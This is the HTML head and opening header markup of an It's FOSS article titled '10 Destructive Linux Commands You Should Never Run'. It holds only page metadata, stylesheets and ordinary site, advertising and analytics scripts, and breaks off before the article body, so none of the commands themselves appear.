<!doctype html>
<html lang="en-US" class="no-js" itemtype="https://schema.org/Blog" itemscope>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
<script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><script type="text/javascript">/* wpack.io publicPath */window.__wpackIoprestoPlayerdist='https://itsfoss.com/wp-content/plugins/presto-player/dist/';</script><title>10 Destructive Linux Commands You Should Never Run - It&#039;s FOSS</title>
<style>
            @supports not (aspect-ratio: 16 / 9) {
  presto-player:not(.hydrated) {
    height: 0;
    padding-bottom: 56%;
    position: relative;
  }
}

presto-player:not(.hydrated) {
  position: relative;
  background: rgba(0, 0, 0, 0.1);
  width: 100%;
  display: block;
  aspect-ratio: 16 / 9;
}

presto-player:not(.hydrated) .presto-loader {
  display: block;
}

.presto-block-video:not(.presto-sticky-parent) {
  border-radius: var(--presto-player-border-radius, 0px);
  overflow: hidden;
  transform: translateZ(0);
}

.presto-block-video.presto-provider-audio{
  overflow: visible;
}

.presto-block-video .presto-sticky-parent {
  overflow: auto;
  transform: none;
}

.presto-sticky-parent {
  z-index: 99998 !important;
}

.presto-player-fullscreen-open {
  z-index: 9999999 !important;
  overflow: visible !important;
  transform: none !important;
}
        </style>
<link rel='stylesheet' id='kadence-dark-mode-css' href='https://itsfoss.com/wp-content/plugins/kadence-pro/dist/dark-mode/dark-mode.css?ver=1.0.5' media='all' />
<style id='kadence-dark-mode-inline-css'>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</style>
<meta name="dc.title" content="10 Destructive Linux Commands You Should Never Run - It&#039;s FOSS" />
<meta name="dc.description" content="Here are some common dangerous Linux commands that trolls try to trick you into running and messing up your Linux system." />
<meta name="dc.relation" content="https://itsfoss.com/dangerous-linux-commands/" />
<meta name="dc.source" content="https://itsfoss.com/" />
<meta name="dc.language" content="en_US" />
<meta name="description" content="Here are some common dangerous Linux commands that trolls try to trick you into running and messing up your Linux system." />
<meta name="robots" content="index, follow" />
<meta name="googlebot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
<meta name="bingbot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" />
<link rel="canonical" href="https://itsfoss.com/dangerous-linux-commands/" />
<meta property="og:url" content="https://itsfoss.com/dangerous-linux-commands/" />
<meta property="og:site_name" content="It&#039;s FOSS" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="article:author" content="https://www.facebook.com/itsfoss" />
<meta property="article:publisher" content="https://www.facebook.com/itsfoss" />
<meta property="article:section" content="List" />
<meta property="og:title" content="10 Destructive Linux Commands You Should Never Run - It&#039;s FOSS" />
<meta property="og:description" content="Here are some common dangerous Linux commands that trolls try to trick you into running and messing up your Linux system." />
<meta property="og:image" content="https://itsfoss.com/wp-content/uploads/2022/09/destructive-linux-commands.png" />
<meta property="og:image:secure_url" content="https://itsfoss.com/wp-content/uploads/2022/09/destructive-linux-commands.png" />
<meta property="og:image:width" content="800" />
<meta property="og:image:height" content="450" />
<meta property="og:image:alt" content="destructive linux commands" />
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@itsfoss2" />
<meta name="twitter:creator" content="@itsfoss2" />
<meta name="twitter:title" content="10 Destructive Linux Commands You Should Never Run - It&#039;s FOSS" />
<meta name="twitter:description" content="Here are some common dangerous Linux commands that trolls try to trick you into running and messing up your Linux system." />
<meta name="twitter:image:src" content="https://itsfoss.com/wp-content/uploads/2022/09/destructive-linux-commands.png" />
<link rel='dns-prefetch' href='//a.omappapi.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel="alternate" type="application/rss+xml" title="It&#039;s FOSS &raquo; Feed" href="https://itsfoss.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="It&#039;s FOSS &raquo; Comments Feed" href="https://itsfoss.com/comments/feed/" />
<script>document.documentElement.classList.remove( 'no-js' );</script>
<link rel="alternate" type="application/rss+xml" title="It&#039;s FOSS &raquo; 10 Destructive Linux Commands You Should Never Run Comments Feed" href="https://itsfoss.com/dangerous-linux-commands/feed/" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/itsfoss.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.0.2/wp-includes/css/dist/block-library/style.min.css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='ugb-style-css-v2-css' href='https://itsfoss.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks-premium/dist/deprecated/frontend_blocks_deprecated_v2.css?ver=3.4.5' media='all' />
<style id='ugb-style-css-v2-inline-css'>
:root {--stk-block-width-default-detected: 1290px;}
:root {
			--content-width: 1290px;
		}
</style>
<link rel='stylesheet' id='ugb-style-css-premium-v2-css' href='https://itsfoss.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks-premium/dist/deprecated/frontend_blocks_deprecated_v2__premium_only.css?ver=3.4.5' media='all' />
<link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.0.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' media='all' />
<style id='wpseopress-local-business-style-inline-css'>
span.wp-block-wpseopress-local-business-field{margin-right:8px}

</style>
<style id='global-styles-inline-css'>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</style>
<link rel='stylesheet' id='siq_icon_css-css' href='https://itsfoss.com/wp-content/plugins/searchiq/assets/3.10/css/frontend/icon-moon.css?ver=1662956674' media='all' />
<link rel='stylesheet' id='siq_front_css-css' href='https://itsfoss.com/wp-content/plugins/searchiq/assets/3.10/css/frontend/stylesheet.css?ver=1662956674' media='all' />
<link rel='stylesheet' id='wp-coupons-styles-css' href='https://itsfoss.com/wp-content/plugins/wp-coupons/css/style.min.css?ver=1.8.0' media='all' />
<link rel='stylesheet' id='lasso-live-css' href='https://itsfoss.com/wp-content/plugins/lasso/admin/assets/css/lasso-live.css?ver=1662694004' media='all' />
<link rel='stylesheet' id='lasso-table-frontend-css' href='https://itsfoss.com/wp-content/plugins/lasso/admin/assets/css/lasso-table-frontend.css?ver=1662694004' media='all' />
<link rel='stylesheet' id='kadence-global-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/global.min.css?ver=1.1.27' media='all' />
<style id='kadence-global-inline-css'>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</style>
<link rel='stylesheet' id='kadence-simplelightbox-css-css' href='https://itsfoss.com/wp-content/plugins/kadence-blocks/dist/assets/css/simplelightbox.css?ver=2.4.14' media='all' />
<link rel='stylesheet' id='aawp-css' href='https://itsfoss.com/wp-content/plugins/aawp/assets/dist/css/main.css?ver=3.18.3' media='all' />
<link rel='stylesheet' id='tcm-front-styles-css-css' href='https://itsfoss.com/wp-content/plugins/thrive-comments/assets/css/styles.css?ver=2.10' media='all' />
<link rel='stylesheet' id='dashicons-css' href='https://c0.wp.com/c/6.0.2/wp-includes/css/dashicons.min.css' media='all' />
<link rel='stylesheet' id='wp-auth-check-css' href='https://c0.wp.com/c/6.0.2/wp-includes/css/wp-auth-check.min.css' media='all' />
<link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/11.3.1/css/jetpack.css' media='all' />
<script id='ugb-block-frontend-js-v2-js-extra'>
var stackable = {"restUrl":"https:\/\/itsfoss.com\/wp-json\/"};
</script>
<script src='https://itsfoss.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks-premium/dist/deprecated/frontend_blocks_deprecated_v2.js?ver=3.4.5' id='ugb-block-frontend-js-v2-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks-premium/dist/deprecated/frontend_blocks_deprecated_v2__premium_only.js?ver=3.4.5' id='ugb-block-frontend-js-premium-v2-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script id='kadence-dark-mode-js-extra'>
var kadenceDarkModeConfig = {"siteSlug":"6ejpon5bjer0","auto":""};
</script>
<script src='https://itsfoss.com/wp-content/plugins/kadence-pro/dist/dark-mode/dark-mode.min.js?ver=1.0.5' id='kadence-dark-mode-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/thrive-comments/assets/js/libs-frontend.min.js?ver=2.10' id='libs-frontend-js'></script>
<style>
            .eaa-clean {
                padding: 0 !important;
                border: none !important;
            }

            .eaa-ad.alignleft {
                margin-right: 10px;
            }

            .eaa-ad.alignright {
                margin-left: 10px;
            }
            .eaa-ad.debug{
                background:peachpuff;
                border:solid 2px #FF0000;
                box-sizing: border-box;
            }

        </style>
<link rel="https://api.w.org/" href="https://itsfoss.com/wp-json/" /><link rel="alternate" type="application/json" href="https://itsfoss.com/wp-json/wp/v2/posts/101619" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://itsfoss.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://itsfoss.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 6.0.2" />
<link rel='shortlink' href='https://itsfoss.com/?p=101619' />
<link rel="alternate" type="application/json+oembed" href="https://itsfoss.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fitsfoss.com%2Fdangerous-linux-commands%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://itsfoss.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fitsfoss.com%2Fdangerous-linux-commands%2F&#038;format=xml" />
<style type="text/css">.aawp .aawp-tb__row--highlight{background-color:#256aaf;}.aawp .aawp-tb__row--highlight{color:#256aaf;}.aawp .aawp-tb__row--highlight a{color:#256aaf;}</style><style type="text/css">.eafl-disclaimer-small { font-size: 0.8em; }
.eafl-disclaimer-smaller { font-size: 0.6em; }</style><script type="text/javascript">
					(function () {
						window.siqConfig = {
							engineKey: "a1b654a075239001e3618e79a806f8a4"
						};
						window.siqConfig.baseUrl = "//pub.searchiq.co/";
						window.siqConfig.preview = true;
						var script = document.createElement("SCRIPT");
						script.src = window.siqConfig.baseUrl + "js/container/siq-container-2.js?cb=" + (Math.floor(Math.random()*999999)) + "&engineKey=" + siqConfig.engineKey;
						script.id = "siq-container";
						document.getElementsByTagName("HEAD")[0].appendChild(script);
					})();
				</script><style>

    /* for unique landing page accent color values,  put any new css added here inside tcb-bridge/js/editor */

    /* accent color */
    #thrive-comments .tcm-color-ac,
    #thrive-comments .tcm-color-ac span {
        color: #00b6ba;
    }

    /* accent color background */
    #thrive-comments .tcm-background-color-ac,
    #thrive-comments .tcm-background-color-ac-h:hover span,
    #thrive-comments .tcm-background-color-ac-active:active {
        background-color: #00b6ba    }

    /* accent color border */
    #thrive-comments .tcm-border-color-ac {
        border-color: #00b6ba;
        outline: none;
    }

    #thrive-comments .tcm-border-color-ac-h:hover {
        border-color: #00b6ba;
    }

    #thrive-comments .tcm-border-bottom-color-ac {
        border-bottom-color: #00b6ba;
    }

    /* accent color fill*/
    #thrive-comments .tcm-svg-fill-ac {
        fill: #00b6ba;
    }

    /* accent color for general elements */

    /* inputs */
    #thrive-comments textarea:focus,
    #thrive-comments input:focus {
        border-color: #00b6ba;
        box-shadow: inset 0 0 3px#00b6ba;
    }

    /* links */
    #thrive-comments a {
        color: #00b6ba;
    }

    /*
	* buttons and login links
	* using id to override the default css border-bottom
	*/
    #thrive-comments button,
    #thrive-comments #tcm-login-up,
    #thrive-comments #tcm-login-down {
        color: #00b6ba;
        border-color: #00b6ba;
    }

    /* general buttons hover and active functionality */
    #thrive-comments button:hover,
    #thrive-comments button:focus,
    #thrive-comments button:active {
        background-color: #00b6ba    }

</style>
<style type="text/css">
			:root{
				--lasso-main: black !important;
				--lasso-title: black !important;
				--lasso-button: #22baa0 !important;
				--lasso-secondary-button: #22baa0 !important;
				--lasso-button-text: white !important;
				--lasso-background: #f3f6f4 !important;
				--lasso-pros: #22baa0 !important;
				--lasso-cons: #e06470 !important;
			}
			
			
		</style>
<script type="text/javascript">
				// Notice how this gets configured before we load Font Awesome
				window.FontAwesomeConfig = { autoReplaceSvg: false }
			</script>
<style>img#wpstats{display:none}</style>
<link rel="preload" id="kadence-header-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/header.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-content-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/content.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-comments-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/comments.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-sidebar-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/sidebar.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-author-box-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/author-box.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-related-posts-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/related-posts.min.css?ver=1.1.27" as="style">
<link rel="preload" id="kadence-splide-preload" href="https://itsfoss.com/wp-content/plugins/kadence-blocks-pro/dist/assets/css/kadence-splide.min.css?ver=1.7.15" as="style">
<link rel="preload" id="kadence-footer-preload" href="https://itsfoss.com/wp-content/themes/kadence/assets/css/footer.min.css?ver=1.1.27" as="style">
<style type="text/css">
				/* If html does not have either class, do not show lazy loaded images. */
				html:not( .jetpack-lazy-images-js-enabled ):not( .js ) .jetpack-lazy-image {
					display: none;
				}
			</style>
<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js-enabled'
				);
			</script>

<script type="text/javascript" async=true>
(function() {
  var host = window.location.hostname;
  var element = document.createElement('script');
  var firstScript = document.getElementsByTagName('script')[0];
  var url = 'https://quantcast.mgr.consensu.org'
    .concat('/choice/', '5LuPvKtMyuU2V', '/', host, '/choice.js')
  var uspTries = 0;
  var uspTriesLimit = 3;
  element.async = true;
  element.type = 'text/javascript';
  element.src = url;

  firstScript.parentNode.insertBefore(element, firstScript);

  function makeStub() {
    var TCF_LOCATOR_NAME = '__tcfapiLocator';
    var queue = [];
    var win = window;
    var cmpFrame;

    function addFrame() {
      var doc = win.document;
      var otherCMP = !!(win.frames[TCF_LOCATOR_NAME]);

      if (!otherCMP) {
        if (doc.body) {
          var iframe = doc.createElement('iframe');

          iframe.style.cssText = 'display:none';
          iframe.name = TCF_LOCATOR_NAME;
          doc.body.appendChild(iframe);
        } else {
          setTimeout(addFrame, 5);
        }
      }
      return !otherCMP;
    }

    function tcfAPIHandler() {
      var gdprApplies;
      var args = arguments;

      if (!args.length) {
        return queue;
      } else if (args[0] === 'setGdprApplies') {
        if (
          args.length > 3 &&
          args[2] === 2 &&
          typeof args[3] === 'boolean'
        ) {
          gdprApplies = args[3];
          if (typeof args[2] === 'function') {
            args[2]('set', true);
          }
        }
      } else if (args[0] === 'ping') {
        var retr = {
          gdprApplies: gdprApplies,
          cmpLoaded: false,
          cmpStatus: 'stub'
        };

        if (typeof args[2] === 'function') {
          args[2](retr);
        }
      } else {
        queue.push(args);
      }
    }

    function postMessageEventHandler(event) {
      var msgIsString = typeof event.data === 'string';
      var json = {};

      try {
        if (msgIsString) {
          json = JSON.parse(event.data);
        } else {
          json = event.data;
        }
      } catch (ignore) {}

      var payload = json.__tcfapiCall;

      if (payload) {
        window.__tcfapi(
          payload.command,
          payload.version,
          function(retValue, success) {
            var returnMsg = {
              __tcfapiReturn: {
                returnValue: retValue,
                success: success,
                callId: payload.callId
              }
            };
            if (msgIsString) {
              returnMsg = JSON.stringify(returnMsg);
            }
            if (event && event.source && event.source.postMessage) {
              event.source.postMessage(returnMsg, '*');
            }
          },
          payload.parameter
        );
      }
    }

    while (win) {
      try {
        if (win.frames[TCF_LOCATOR_NAME]) {
          cmpFrame = win;
          break;
        }
      } catch (ignore) {}

      if (win === window.top) {
        break;
      }
      win = win.parent;
    }
    if (!cmpFrame) {
      addFrame();
      win.__tcfapi = tcfAPIHandler;
      win.addEventListener('message', postMessageEventHandler, false);
    }
  };

  makeStub();

  var uspStubFunction = function() {
    var arg = arguments;
    if (typeof window.__uspapi !== uspStubFunction) {
      setTimeout(function() {
        if (typeof window.__uspapi !== 'undefined') {
          window.__uspapi.apply(window.__uspapi, arg);
        }
      }, 500);
    }
  };

  var checkIfUspIsReady = function() {
    uspTries++;
    if (window.__uspapi === uspStubFunction && uspTries < uspTriesLimit) {
      console.warn('USP is not accessible');
    } else {
      clearInterval(uspInterval);
    }
  };

  if (typeof window.__uspapi === 'undefined') {
    window.__uspapi = uspStubFunction;
    var uspInterval = setInterval(checkIfUspIsReady, 6000);
  }
})();
</script>

<link rel="stylesheet" href="https://a.pub.network/core/pubfig/cls.css">
<script data-cfasync="false" type="text/javascript">
  var freestar = freestar || {};
  freestar.queue = freestar.queue || [];
  freestar.config = freestar.config || {};
  // Tag IDs set here, must match Tags served in the Body for proper setup
  freestar.config.enabled_slots = [];
  freestar.initCallback = function () { (freestar.config.enabled_slots.length === 0) ? freestar.initCallbackCalled = false : freestar.newAdSlots(freestar.config.enabled_slots) }
</script>
<script src="https://a.pub.network/itsfoss/pubfig.min.js" async></script>
<script type="text/javascript" async src="//l.getsitecontrol.com/z4qx8gjw.js"></script>
<script data-cfasync='false' type='text/javascript'>(function (a, c, s, u){'Insticator'in a || (a.Insticator={ad:{loadAd: function (b){Insticator.ad.q.push(b)}, q: []}, helper:{}, embed:{}, version: "4.0", q: [], load: function (t, o){Insticator.q.push({t: t, o: o})}}); var b=c.createElement(s); b.src=u; b.async=!0; var d=c.getElementsByTagName(s)[0]; d.parentNode.insertBefore(b, d)})(window, document, 'script', 'https://d3lcz8vpax4lo2.cloudfront.net/ads-code/f37505be-f0a0-40bd-9430-0b22ff773ecd.js')</script><script async type="text/javascript" src="https://product.instiengage.com/product-loader-code/f37505be-f0a0-40bd-9430-0b22ff773ecd.js"></script>
<script type="text/javascript" src="https://static.apester.com/js/sdk/latest/apester-sdk.js" async></script><link rel="icon" href="https://itsfoss.com/wp-content/uploads/2017/06/cropped-Logo-redsigned-without-name-32x32.png" sizes="32x32" />
<link rel="icon" href="https://itsfoss.com/wp-content/uploads/2017/06/cropped-Logo-redsigned-without-name-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://itsfoss.com/wp-content/uploads/2017/06/cropped-Logo-redsigned-without-name-180x180.png" />
<meta name="msapplication-TileImage" content="https://itsfoss.com/wp-content/uploads/2017/06/cropped-Logo-redsigned-without-name-270x270.png" />
<style type="text/css" id="wp-custom-css">.entry-content code {
 background-color: #00B6BA;
 color: #ffffff;
 font-size: 1em;
}
.entry-content pre {
 background-color: #00B6BA;
	color: #ffffff;
	padding: 1em 1em;
 overflow: auto;
 word-wrap: normal;
}

/* text selection color */
::-moz-selection {
    background-color: #B2D531;
    color: #fff;
}
 
::selection {
    background-color: #B2D531;
    color: #fff;
}
.highlight > a {
background-color: #ffff00;
color: #000000;
}

.wp-caption-text {
    text-align: center;
}

/* move anchor down */
:target::before {
  content: "";
  display: block;
  height: 150px;
  margin: -150px 0 0;
}

div.lasso-description {

color: black !important;

}

/* Hide sidebar on mobile */
@media (max-width: 767px) {
aside#secondary {
display: none;
}
}</style>
<script type='text/javascript'>
				var _gaq = _gaq || [];
				_gaq.push(['_setAccount', 'UA-24863836-4']);
_gaq.push(['_trackPageview']);
_gaq.push(['_gat._anonymizeIp']);
				(function() {
					var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
					ga.src = ('https:' === document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
					var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
				})();
			</script>

</head>
<body class="post-template-default single single-post postid-101619 single-format-standard wp-custom-logo wp-embed-responsive aawp-custom stk--is-kadence-theme footer-on-bottom animate-body-popup hide-focus-outline link-style-hover-background has-sidebar has-sticky-sidebar content-title-style-normal content-width-normal content-style-unboxed content-vertical-padding-show non-transparent-header mobile-non-transparent-header color-switch-light">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB"><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><div id="wrapper" class="site wp-site-blocks">
<a class="skip-link screen-reader-text scroll-ignore" href="#main">Skip to content</a>
<link rel='stylesheet' id='kadence-header-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/header.min.css?ver=1.1.27' media='all' />
<header id="masthead" class="site-header" role="banner" itemtype="https://schema.org/WPHeader" itemscope>
<div id="main-header" class="site-header-wrap">
<div class="site-header-inner-wrap kadence-sticky-header" data-reveal-scroll-up="false" data-shrink="false">
<div class="site-header-upper-wrap">
<div class="site-header-upper-inner-wrap">
<div class="site-top-header-wrap site-header-row-container site-header-focus-item site-header-row-layout-standard" data-section="kadence_customizer_header_top">
<div class="site-header-row-container-inner">
<div class="site-container">
